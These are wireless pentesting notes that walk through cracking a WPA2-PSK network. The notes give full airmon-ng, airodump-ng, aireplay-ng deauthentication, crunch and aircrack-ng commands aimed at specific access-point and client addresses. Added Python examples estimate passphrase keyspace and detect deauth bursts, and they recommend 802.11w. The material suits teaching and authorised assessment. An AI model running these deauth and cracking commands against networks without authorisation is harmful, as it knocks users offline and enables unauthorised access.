-
Wireless Pentesting - assessment of a wireless network (WPA2 PSK or WPA2 Enterprise).
-
Activities performed:
- Evaluating strength of PSK
- Reviewing nearby networks
- Assessing guest networks
- Checking network access
-
Tools used - wireless card (one that supports monitor mode), router, laptop
-
Process (for WPA2 PSK):
-
Place wireless card into monitor mode
-
Discover info about network (channel, BSSID)
-
Select network & capture data
-
Perform deauth attack
-
Capture WPA handshake
-
Attempt to crack handshake
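Whether the last step succeeds depends almost entirely on the size of the keyspace the PSK was chosen from, which is what "evaluating strength of PSK" comes down to. The following Python script is an added example, not part of the original notes: it computes the keyspace of a `crunch -t` pattern (using the @, , and % placeholder classes from the crunch man page; the ^ symbol class is left out), converts that to bits of entropy, and estimates worst-case exhaustion time. The guess rate of 1,000,000 WPA2 guesses per second is an assumed figure for illustration, not a measured benchmark, and the comparison rows for random passphrases are constructed.

```python
import math

# Placeholder classes understood by `crunch -t` (from the crunch man page):
# @ = lowercase letter, , = uppercase letter, % = digit. Any other character in
# the pattern is a literal with exactly one choice. The ^ (symbol) placeholder
# is left out here because the size of crunch's symbol set is not stated above.
CRUNCH_CLASSES = {"@": 26, ",": 26, "%": 10}

# Assumed guess rate for WPA2-PSK (PBKDF2-HMAC-SHA1, 4096 rounds) on one
# modern GPU. This is a constructed figure for illustration, not a benchmark.
ASSUMED_GUESSES_PER_SECOND = 1_000_000


def crunch_keyspace(pattern: str) -> int:
    """Number of candidates `crunch N N -t PATTERN` emits for an N-character pattern."""
    size = 1
    for ch in pattern:
        size *= CRUNCH_CLASSES.get(ch, 1)
    return size


def random_keyspace(alphabet_size: int, length: int) -> int:
    """Candidates that must be covered to exhaust a uniformly random PSK."""
    return alphabet_size ** length


def entropy_bits(keyspace: int) -> float:
    """Effective entropy: bits of guessing work the keyspace represents."""
    return math.log2(keyspace)


def crack_time_seconds(keyspace: int,
                       guesses_per_second: float = ASSUMED_GUESSES_PER_SECOND) -> float:
    """Worst-case time to try every candidate at the given rate."""
    return keyspace / guesses_per_second


def human_duration(seconds: float) -> str:
    """Render a duration in the largest unit that fits."""
    units = [("years", 365 * 24 * 3600), ("days", 24 * 3600),
             ("hours", 3600), ("minutes", 60)]
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:,.1f} {name}"
    return f"{seconds:,.3f} seconds"


def assess(label: str, keyspace: int) -> dict:
    """Summarise one keyspace as a report row."""
    return {
        "label": label,
        "keyspace": keyspace,
        "bits": round(entropy_bits(keyspace), 1),
        "worst_case": human_duration(crack_time_seconds(keyspace)),
    }


if __name__ == "__main__":
    rows = [
        assess("crunch pattern %@aaaa@% (wordlist from the notes)", crunch_keyspace("%@aaaa@%")),
        assess("random 8 chars, [a-z0-9]", random_keyspace(36, 8)),
        assess("random 8 chars, 95 printable ASCII", random_keyspace(95, 8)),
        assess("random 16 chars, [a-z0-9]", random_keyspace(36, 16)),
        assess("4 random words from a 7776-word list", random_keyspace(7776, 4)),
    ]
    for row in rows:
        print(f"{row['label']:<52} {row['keyspace']:>24,d} "
              f"{row['bits']:>6} bits  worst case {row['worst_case']}")
```

The pattern used in the notes has only 67,600 candidates (about 16 bits), so the crack is over in well under a second at the assumed rate; a random 8-character alphanumeric PSK already needs weeks, and anything at 16 random characters or a multi-word passphrase is out of reach of this kind of wordlist attack. The practical recommendation that follows is a long random passphrase rather than a short pattern-shaped one.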
-
#connect the wireless card to the laptop
#confirm it is detected by listing the wireless interfaces
iwconfig
#if it lists wlan0, the card is connected
#it is currently in managed mode
#we need to place it in monitor mode
sudo airmon-ng check kill
#kill processes (NetworkManager, wpa_supplicant, ...) that would interfere with monitor mode
sudo airmon-ng start wlan0
#start monitor mode on the interface
iwconfig
#wlan0mon is now active
sudo airodump-ng wlan0mon
#scan for nearby networks (this also covers the "reviewing nearby networks" activity)
#stop it with Ctrl-C after identifying the target network and noting its channel and BSSID
sudo airodump-ng -c 11 --bssid 74:D2:1D:A4:82:5A -w capture wlan0mon
#-c for the channel, --bssid for the access point's BSSID
#-w for the capture filename prefix (airodump-ng appends -01, -02, ...)
#to capture the handshake a client must (re)associate, so we run a deauth attack
#in a new tab, leaving airodump-ng running
sudo aireplay-ng -0 1 -a 74:D2:1D:A4:82:5A -c BC:6A:D1:81:5C:8B wlan0mon
#-0 1 runs one round of deauthentication; -a is the access point, -c the station to deauth
#the station reconnects and the 4-way handshake is recorded by airodump-ng
#(airodump-ng shows "WPA handshake: <BSSID>" in its header line once it has one)
ls
#the capture files (capture-01.cap etc.) are present now
#a wordlist can be generated with crunch
crunch 8 8 -t %@aaaa@% -o samplewordlist.txt
#8 8 = minimum and maximum length of 8 characters
#-t pattern: % is a digit, @ is a lowercase letter, other characters are literal
#to crack the handshake
aircrack-ng -w samplewordlist.txt -b 74:D2:1D:A4:82:5A capture-01.cap
#-w is the wordlist, -b the access point's BSSID
#the .cap file contains the captured handshake to be cracked
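From the defender's side, the deauthentication step above is the loudest part of the whole procedure: a burst of deauth/disassoc frames claiming to come from the AP, all inside a fraction of a second, is not something legitimate clients produce. The Python script below is an added example (not part of the original notes) of the sliding-window check a WIDS or a monitor-mode sensor would run over management frames. The frame records are a constructed sample in a made-up `timestamp subtype src dst bssid reason` format; the AP and station addresses are the ones from the notes above, the timings are invented. The durable mitigation is 802.11w Protected Management Frames, which makes stations reject unauthenticated deauth/disassoc frames and is mandatory in WPA3.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management-frame records, one per line:
#   <epoch seconds> <subtype> <src MAC> <dst MAC> <BSSID> <reason code or ->
# The AP and station MACs are taken from the notes; the timings, the burst of
# twelve deauth frames and the later lone disassoc are made up for this example.
AP = "74:d2:1d:a4:82:5a"
STATION = "bc:6a:d1:81:5c:8b"
BROADCAST = "ff:ff:ff:ff:ff:ff"

SAMPLE_FRAMES = "\n".join(
    [f"1700000000.{i:03d} beacon {AP} {BROADCAST} {AP} -" for i in (0, 102, 205)]
    # twelve deauthentication frames within ~0.55 s, all "from" the AP
    + [f"1700000001.{i * 50:03d} deauth {AP} {STATION} {AP} 7" for i in range(12)]
    # one isolated disassociation minutes later, e.g. a client roaming away
    + [f"1700000300.000 disassoc {STATION} {AP} {AP} 8"]
)

DISCONNECT_SUBTYPES = {"deauth", "disassoc"}


def parse_frame(line: str) -> dict:
    """Parse one record of the constructed format into a dict."""
    ts, subtype, src, dst, bssid, reason = line.split()
    return {
        "ts": float(ts),
        "subtype": subtype,
        "src": src.lower(),
        "dst": dst.lower(),
        "bssid": bssid.lower(),
        "reason": None if reason == "-" else int(reason),
    }


def detect_deauth_bursts(lines, window_s: float = 1.0, threshold: int = 10) -> list:
    """Sliding-window count of deauth/disassoc frames per BSSID.

    An alert is emitted at the moment the count inside `window_s` reaches
    `threshold`, so one burst yields exactly one alert. Legitimate roaming
    produces single frames spread over time and never reaches the threshold.
    """
    recent = defaultdict(deque)  # BSSID -> frames seen inside the window
    alerts = []
    frames = sorted((parse_frame(l) for l in lines if l.strip()), key=lambda f: f["ts"])
    for f in frames:
        if f["subtype"] not in DISCONNECT_SUBTYPES:
            continue
        q = recent[f["bssid"]]
        q.append(f)
        while f["ts"] - q[0]["ts"] > window_s:  # drop frames older than the window
            q.popleft()
        if len(q) == threshold:
            alerts.append({
                "bssid": f["bssid"],
                "first_ts": q[0]["ts"],
                "last_ts": f["ts"],
                "count": len(q),
                "targets": sorted({x["dst"] for x in q}),
                "broadcast": any(x["dst"] == BROADCAST for x in q),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES.splitlines()):
        span = a["last_ts"] - a["first_ts"]
        kind = "broadcast" if a["broadcast"] else "targeted"
        print(f"ALERT deauth burst on BSSID {a['bssid']}: {a['count']} frames "
              f"in {span:.2f}s ({kind}), targets={a['targets']}")
```

On the sample the burst trips the alert at its tenth frame while the lone disassociation five minutes later does not. Tune `window_s` and `threshold` to the environment: dense networks with many roaming clients need a higher threshold per BSSID, and a broadcast-addressed burst deserves a higher severity than one aimed at a single station.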